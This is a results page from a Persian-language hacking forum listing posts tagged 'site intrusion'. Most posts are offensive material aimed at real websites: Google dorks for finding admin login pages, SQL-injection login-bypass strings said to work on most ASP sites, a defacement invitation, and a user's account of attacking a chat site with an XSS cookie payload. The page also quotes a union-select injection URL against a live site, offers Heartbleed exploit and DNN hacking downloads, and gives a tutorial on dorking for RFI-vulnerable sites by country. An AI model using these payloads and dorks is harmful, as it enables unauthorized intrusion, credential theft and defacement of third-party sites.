جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'نفوذ به سایت'.
11 نتیجه پیدا شد
-
نفوذ به سایت بدون داشتن پسورد ادمین ...! ( آموزش هک سایت بدون باگ )
Mehran_FLash پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
با سلام امروز یک آموزش ویژه براتون آوردم شما با این روش بدون داشتن نام کاربری و رمز عبور ادمین به سایت نفوذ میکنید ..! این روش فقط روی سایت های asp جواب میده . برای شروع یه سری دورک براتون میذارم . دورک ها : دورک ها سری کدهایی هستند که فرد برای جستوی سریع و دقیق تردر موتور های جستجو گر از آن استفاده میکند. "inurl:admin.asp" "inurl:login/admin.asp" "inurl:admin/login.asp" "inurl:adminlogin.asp" "inurl:adminhome.asp" "inurl:admin_login.asp" "inurl:administratorlogin.asp" "inurl:login/administrator.asp" "inurl:administrator_login.asp" خب این از دورک ها . اینم از نام کاربری و رمز ها : '=' 'or' 'or ' 'x'='x "or "x"="x or 0=0 # 'or 1=1-- دقت داشته باشید اگر نام کاربری '=' 'or' باشه پسورد هم '=' 'or' هستش برای مثال نام کاربری : '=' 'or' پسورد : '=' 'or' ================================================== نام کاربری : 'or ' 'x'='x رمز : 'or ' 'x'='x ================================================== خب اگر همه رو امتحان کنید جواب میده. اینم بگم که این ها روی 90% از سایت های asp جواب میدن موفق و پیروز باشید- 6 پاسخ
-
- آموزش هک سایت
- هک مدیر سایت
- (و 8 مورد دیگر)
-
xpath injection Xpath Injection Vulnerability Training
MR.MSA پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی
با سلام خدمت دوستان عزیز . امروز براتون ویدئویی رو قرار دادم در رابطه با اسیب پذیری Xpath Injection اگه صدا مشکل داره توی خود یوتیوب مشاهده کنید . ( در ضمن به دلایل امنیتی صدا رو تغییر دادم ) همچنین قبلا هم یک پست اموزشی گزاشتم که میتونید از اون هم استفاده کنید : دکمه تشکر کنار تاپیک فراموش نشه . موفق و پیروز باشید .-
- web application firewall bypass
- waf
- (و 16 مورد دیگر)
-
مشکل در نفوذ به سایت دارای باگ sql و سایتی که باگ xss داره
s.a.e.e.d پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام دوستان یه سایت(چت روم خارجی) رو اسکن کردم که باگ xss داره ولی نمیدونم چجوری باید به این باگ نفوذ کرد نتیجه اسکن دوتا روش تو انجمن دیدم که یکی تزریق این کد بود <script>alert(document.cookie)</script> ولی وقتی اینو تو قسمت عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست و روش دوم ریختن اسکریپت کیلاگر توسط باگ xss بود که اینم باید تو ادمین پیج انجام میدادی که نمیشد وقتی سایت رو اسکن کردم vega یه سری کوکی هم اوورد به نظرتون اونا بدرد میخوره !!!! whatweb هم یه سری کوکی بهم داد اینا به کار میان !!! سایت cpanel داره راهی برای نفوذ به cpanel هست !! از ابزار brutesploit میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید 25-53-80-110-119-143 ============================================================================================================================================================== و سایت دوم که باگ sql داشت (این سوال رو یبار پرسیدم ولی جوابی نگرفتم ) من تو قسمت فراخوانی تیبل ادمین مشکل دارم این سایت دارای باگ = [Hidden Content] اینم تمام تیبل هایی که داره = CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIE من تیبل USER رو به هگز=(0x55534552) تبدیل کردم و دستورات رو به این شکل وارد کردم ولی نتیجه ای نگرفتم ! [Hidden Content]/news_display.php?id=-1397+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+%20information_schema.columns+where+table_name=0x55534552-- اساتید لطفا راهنمایی کنید- 2 پاسخ
-
- cross-site script
- هک چت روم
-
(و 12 مورد دیگر)
برچسب زده شده با :
-
سلام یک بایپس دیدم گفتم بزارم دوستان هم استفاده کنن برای دوستان مبتدی فیلم هم قرار دادم user:' OR 1 --+ password:' OR 1 --+ dork:inurl:emplogin.php intext:"Employer's Login" dork:inurl:login.php intext:"Employer's Login" امیدوارم مفید باشه دوستانی که به دفیس علاقه دارن بهم پیام بدن bypass.rar
-
راهنمایی برای استفاده از باگ SQL
ElkCloner پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
با سلام من میخوام که با استفاده از باگ SQL توی سافت هویج تیبل های یه سایت رو در بیارم ولی ارور Keyword مانع میشه لطفا اگه اطلاعاتی در این مورد دارید که چطور بطرف کنم و توی بخش Keyword جی بنویسیم ممنون -
نفوذ به سایت در کالی
sezar1370 پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
با سلام خدمت بزرگان گارد ایران بنده یک سایت رو در کالی اسکن کردم با برنامه vega نتیجه اسکن : خوب حالا راهنمایی لازم دارم برای ادامه مسیر نمیدونم چیکار کنم 1 هفته نمیشه با کالی دارم کار میکنم :-( -
خب بعد از این چند ماه که از این باگ عظیم رونمایی شده این مدت حرفو حدیث راجع بهش کم شده جای این باگ و اموزشش تو گاردایران خالی بود خواستم آموزش تصویری ازش بزارم اما بهتر دونستم اول توضیحی راجع بهش بدم که کمتر کسایی که هنوز ازش بیخبر هستند با زهنی باز و اطلاعی مناسب به دیدن فیلم آموزشی که قرار میدم بپردازند... خونریزی قلبی (Heartbleed) چیست؟ این نقص یکی از بزرگترین مسائل امنیتی است که اینترنت تاکنون با آن مواجه بوده است. بروس اشنایر، کارشناس امنیتی، این اشکال را “فاجعهبار” میداند و درباره وخامت آن میگوید: “بین ۱ تا ۱۰ به آن نمره ۱۱ میدهم این نقص یکی از بزرگترین مسائل امنیتی است که اینترنت تاکنون با آن مواجه بوده است اشکال نرمافزاری هارتبلید چیست؟ این اشکال در بخشی از یک نرمافزار اوپنسورس (منبعباز) بنام Open SSL وجود دارد که برای رمزگذاری ارتباطات میان کامپیوتر یک کاربر و سرور اینترنت طراحی شده، و در واقع نوعی آشنایی دادن در ابتدای یک مکالمه ایمن است. نام خونریزی قلبی (هارتبلید) از آن جهت به آن داده شده که بر یکی از ضمائم SSL تأثیر میگذارد که مهندسان به آن نام ضربان قلب داده اند. این یکی از رایجترین ابزارهای رمزگذاری در اینترنت است و تصور میشود که حدود دوسوم وبسایتها از آن استفاده میکنند. اگر در صفحه مرورگرتان علامت یک قفل کوچک را میبینید، به احتمال زیاد از SSL استفاده میکنید. تصور میشود که این اشکال نرمافزاری نیممیلیون وبسایت را تحت تأثیر خود قرار داده باشد. اشکال نرمافزاری هارتبلید چیست؟ این اشکال در بخشی از یک نرمافزار اوپنسورس (منبعباز) بنام Open SSL وجود دارد که برای رمزگذاری ارتباطات میان کامپیوتر یک کاربر و سرور اینترنت طراحی شده، و در واقع نوعی آشنایی دادن در ابتدای یک مکالمه ایمن است. نام خونریزی قلبی (هارتبلید) از آن جهت به آن داده شده که بر یکی از ضمائم SSL تأثیر میگذارد که مهندسان به آن نام ضربان قلب داده اند. این یکی از رایجترین ابزارهای رمزگذاری در اینترنت است و تصور میشود که حدود دوسوم وبسایتها از آن استفاده میکنند. اگر در صفحه مرورگرتان علامت یک قفل کوچک را میبینید، به احتمال زیاد از SSL استفاده میکنید. تصور میشود که این اشکال نرمافزاری نیممیلیون وبسایت را تحت تأثیر خود قرار داده باشد. یک پژوهشگر در وبلاگ خود نوشته: “اشکال نرمافزاری هارتبلید به هرکسی اجازه میدهد حافظه سیستمهایی که با نسخههای آسیبپذیر نرمافزار Open SSL محافظت میشوند را بخواند. این کار کلیدهای مخفی مورد استفاده برای شناسایی ارائهکنندگان خدمات و رمزگذاری مبادلات، نام و رمز عبورهای کاربران را در معرض خطر قرار میدهد. به این ترتیب مهاجمان میتوانند ارتباطات را شنود کنند و دادهها را بدزدند، و هویت خدمات و کاربران را جعل کنند.” این اشکال نرمافزاری آنقدر جدی است که وبسایتی مخصوص آن راهاندازی شده که در آن به همه جنبههای مشکل پرداخته میشود. آیا برای جلوگیری از خسارت از Heartbleed باید رمزهای عبورتان را تغییر دهید ؟ چگونه مطمئن شوم که رمز عبورم قوی است؟ مسأله به رمز عبورهای ضعیف مربوط نمیشد، اما فراخوانهایی برای تعیین رمز عبورهای جدید بهراه افتاده است. پروفسور وودوارد، کارشناس امنیت اینترنتی، میگوید که مردم باید مرتبا رمزهای عبورشان را تغییر دهند، و باید مطمئن شوند که عبارتی را بهعنوان رمز عبور انتخاب میکنند که به خودشان مربوط نمیشود. مثلا نام حیوان خانگی گزینه مناسبی نیست. کلماتی که در فرهنگهای لغات وجود دارند مناسبند. البته بهتر است از ترکیبی از کلمات و اعداد استفاده شود. بعضی شرکتها هم جایگزینهایی برای رمزهای عبور ارائه میکنند. شرکتهای سازنده تلفن همراه، از جمله اپل و سامسونگ، دستگاههای خواننده اثر انگشت را به تلفنهای خود اضافه کرده اند. این گزینه به کاربران امکان میدهد تنها با کشیدن انگشتشان روی صفحه تلفن به خود دستگاه و بعضی کارکردهای آن دسترسی پیدا کنند.
- 3 پاسخ
-
- حفره امنیتی heart bleed
- نفوذ به سایت
- (و 8 مورد دیگر)
-
آموزش تصویری نفوذ از طریق حفره heartbleed
RT3N پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
قبل از اینکه فیلم آموزشی رو دریافت کنید اگر آشنایی با این باگ ندارید به تاپیک زیر برید چند خط مطلب راجع به این باگ نوشته شده بخونید وقتتون رو نمیگیره فقط بخاطر آشنایی کاملتون عرض کردم... لینک تاپیک : کلیک کنید در زمان استفاده از این باگ باید صبور باشید اگر مثلا هدفتون بدست اوردن نام کاربری و پسورد سایت مورد نظر هست اگر با بار اول نتیجه نگرفتید باید بارها امتحان کنید... فیلم واضح و ساده هستش... فیلم + اکسبلویت password: guardiran.org heart bleed.rar heart.rar- 4 پاسخ
-
- Open SSL
- خونریزی قلبی
- (و 6 مورد دیگر)
-
آموزش هک سایت با باگ DNN
NeX.LINUX پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
..:: به نام خدا ::.. با ســلام خدمت کاربران محترم و مدیران سایــت امنیتی گــارد ایــران . امروز بنده آموزش یکی از باگ های قدیمی DNN که مخفف شده DotNetNuke است رو برای شما دوستان عزیز قرار می دهم . از دوستان عزیز درخواست میشه که داخل تاپیک سوال نپرسن و اسپم ایجاد نکنند و سوالات را در بخش پرسش و پاسخ نفوذ به سایت ها و سرورها مطرح کنید تاپیک دیگری هم برای دورک های باگ DNN هم زده خواهد شد . با تشکر . پسورد فایل : guardiran.orgDnn Bug Site Hacking.rar -
این ابزار کالی (fierce) هم جز ابزار هایی هستش که برای تکمیل اطلاعات اولیه راجع به سایت و سرور مورد نظر به نفوذگر (هکر) کمک قابل ستایشی میکنه فیلم مختصر و کوتاه فقط جهت معرفی این ابزار و نحوه ی استفاده از آن میباشد موفق و پیروز باشید پسورد: guardiran.org fierce.rar
-
- هک سایت
- هک و امنیت
- (و 8 مورد دیگر)
-
با سلام میخوام ی اندازه کوچولو درمورد دورک ها (Dork) میدونم بگم و اموزش ساختنش: اول اینکه دورکها عباراتی هستند ک واسه یافتن سایتهای که دارای باگ خاصی بکار میرن و شما برای یافتن تارگتها حتما باید دورک مربوطه را درگوگل جستجو کنید تا به نتیجه مورد نظر خودتون برسید - "*":inurl این عبارت هر چیزی رو که بجای * مینویسید درگوگل در urlسایتها جستجو میکند - "*":intext با این عبارت هر نوشته ای بجای *است رو دربین سایتها توسط گوگل جستجو میکنه - "*":intitle این عبارتم هرچی بجای ستاره است رو در عنوان سایتها توسط گوگل جستجو میکنه inurl:forum- اینم میگه سایتهایی ک تو ادرسشون forumدارن یعنی انجمن دارن رو جستجو کن -inurl:index.php?filename= مثلا این دورک سايت هاي كه داراي باگ RFI اند وداراي يك گزينه هستن رو از گوگل ميخواهد سايتهاي كه در URL شان متن بالا است را پيدا كنه. ولی اگه بخوایم یه سایت رو پیدا کنیم چی یا اینکه یه مجموعه ای از سایت ها با باگ مشخص از ی کشور خاص -"inurl:"/index.php?filename=" site"guardiran.org این دورک سایت گارد ایرانو جستجو میکنه ببینه بینم باگ rfiداره یا نه؟ شما میتونید بجای گارد ایران سایت مورد نظر خودتونو با پسوندش بنویسید -حالاهم مجموعه سایتها از یه کشور خاص مثلا ایران"اینو فقط گفتم چون پسوند سایتهای خارجی رو نمیدونستم خودمونو مثال زدم ولی شما لطفا به سایتهای خودمونی کاری نداشته باشید" -site:.ir inurl:index.php?filename اینم اگه اشتباه نکنم باگ rfiرو تو سایتهای ایرانی جستجو میکنه راستی سایت هم بیانگ سایته طبق دستوراتی ک شما وارد میکنید یه سایت خاص یا مجموعه سایتهای یه کشور طبق بالا و در اخر نمیدونم این مطالب به دردتون میخوره یا نه اگه دیدین میخوره تشکر یادتون نره لطفا
-
- گوگل هکینگ
- اموزش Google hacking
- (و 8 مورد دیگر)